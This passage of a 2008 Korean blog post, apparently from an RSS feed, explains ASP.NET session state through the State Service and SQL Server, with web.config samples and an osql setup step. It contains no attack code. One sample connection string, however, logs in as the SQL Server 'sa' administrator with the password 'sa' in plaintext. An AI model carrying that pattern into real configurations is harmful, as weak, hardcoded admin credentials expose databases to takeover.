style="margin-left: 42pt; text-indent: -21pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">③<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">/bin </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">폴더내의어셈블리를 경신한 경우</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 42pt; text-indent: -21pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">④<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">어플리케이션 장해로 웹서버를 재기동해야 하는 경우</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 21pt;"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">위와 같은 경우에도 세션 관리 서버는그대로 유지되므로 세션 정보를 손실할 우려가 없다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">3.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">여러 대의 웹 서버가 세션 공유 가능</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br style=""><!--[if !supportLineBreakNewLine]--><br style=""><!--[endif]--><o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">단점</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">세션 정보를 관리 프로세스가 관리하므로</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">, </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">세션 정보의 참조나 설정시 관리 프로세스에 액세스해야 한다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">. </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">동일 프로세스로의 액세스와 비교하면 오버헤드가 증가하므로</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">, </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">오버헤드로 인한 손실이 위의 장점보다 큰 경우에는 사용하지 말 것을 권장한다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">기동 순서</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">1.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">State </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">서비스의 기동</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">관리 도구</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"> -&gt; </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">서비스 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">-&gt; ASP.NET State Service </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">를 시작</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: blue;" lang="EN-US"><span style="">2.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></span></b><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">State </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">서비스의 활성화</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
web.config</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">의 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">sessionState </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">요소를 이하와 같이 설정한다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">(</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가상 디렉터리안에있는 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">web.config</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">만 설정할 수 있다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">).<br />
<b style=""><span style="color: blue;">&lt;?xmlversion="1.0" encoding="UTF-8" ?&gt;<br />
&lt;configuration&gt;<br />
<span style="">&nbsp; </span>&lt;system.web&gt;<br />
<span style="">&nbsp;&nbsp;&nbsp; </span>&lt;sessionStatemode="StateServer"<br />
<span style="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>stateConnectionString="tcpip=127.0.0.1:42424"<br />
<span style="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>stateNetworkTimeout="10"/&gt;<br />
<span style="">&nbsp; </span>&lt;/system.web&gt;<br />
&lt;/configuration&gt;<o:p></o:p></span></b></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">3.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">서비스의 기동 확인</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">작업 관리자</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"> -&gt; </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">프로세스 에서 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">aspnet_state.exe </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 기동되고있는지 확인한다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">다른 방법</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">SQL Server</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">로 세션 정보를 관리하는 방법</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">정의</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">: </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">세션 정보를</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">SQL Server</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">의 테이블에 보존하므로 세션 정보가 늘어나도 메모리부하는 증가하지 않는다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">필요성</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">: State Service</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">로 세션 정보를 관리하는 것도 결국 메모리상에서 관리하는 방법이므로</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">, DataSet</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">오브젝트와 같이 대량의 데이터를 세션 정보로서 관리하는 경우에는 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">State Service </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">서버의 메모리 부하도 증가하게 된다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p>&nbsp;</o:p></span></p><p class="MsoNormal"><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">기동 순서</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">1.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">다음과 같이</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">osql </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">커맨드를 사용하여 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322 (Windows XP</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">의 경우</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">) </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">폴더의 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">InstallSqlState.sql</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">파일 안에 있는 내용을 복사하여 붙여넣기한다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<br />
<b style=""><span style="color: blue;">&gt; osql -U sa<br />
</span></b></span><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: blue;" lang="KO">패스워드</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: blue;" lang="EN-US"> : **</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: blue;" lang="EN-US"><br />
1&gt;</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: red;" lang="EN-US"> USE master<br />
GO<br />
/* Drop the database containing our sprocs */<br />
IF DB_ID('ASPState') IS NOT NULL BEGIN<br />
DROP DATABASE ASPState<br />
END<br />
…</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: red;" lang="KO">이하 생략</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;; color: red;" lang="EN-US">…<br />
<br />
</span></b><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">정상적으로 완료되면<b style=""> </b></span><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">ASPState(</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">세션 조작용 </span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">StoredProcedure) DB</span></b><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">와 </span><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">tempdb(</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">세션 보관용 테이블</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">) DB</span></b><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 생성된다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.<o:p></o:p></span></p><p class="MsoNormal" style="margin-left: 18pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><span style="">2.<span style="font-family: &quot;Times New Roman&quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></span><!--[endif]--><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">SQL Server </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">활성화</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
web.conf</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">의 </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">sessionState </span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">요소를 다음과 같이 설정한다</span><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><br />
<b style=""><span style="color: blue;">&lt;?xmlversion="1.0" encoding="UTF-8" ?&gt;<br />
&lt;configuration&gt;<br />
<span style="">&nbsp; </span>&lt;system.web&gt;<br />
<span style="">&nbsp;&nbsp;&nbsp; </span>&lt;sessionStatemode="SQLServer"<br />
<span style="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>sqlConnectionString="DataSource=(local);user id=sa;password=sa" /&gt;<br />
<span style="">&nbsp; </span>&lt;/system.web&gt;<br />
&lt;/configuration&gt;</span></b><o:p></o:p></span></p><p class="MsoNormal"><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US"><o:p>&nbsp;</o:p></span></b></p><p class="MsoNormal"><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">부하 측면에서는</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">SQLServer &gt; State Service &gt; Inprocess </span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">순이므로</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">, </span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">속도는</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">Inprocess</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">가 가장 빠르다</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">. </span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="KO">따라서 자신의 환경에 가장 적합한 관리 방법을 선택하는것이 중요하다고 할 수 있다</span></b><b style=""><span style="font-size: 9pt; font-family: &quot;Malgun Gothic&quot;;" lang="EN-US">.</span></b></p>			 ]]> 
		</description>
		<category>Memo</category>

		<comments>http://misman95.egloos.com/2100058#comments</comments>
		<pubDate>Thu, 16 Oct 2008 08:14:55 GMT</pubDate>
		<dc:creator>Jang</dc:creator>
	</item>
</channel>
</rss>
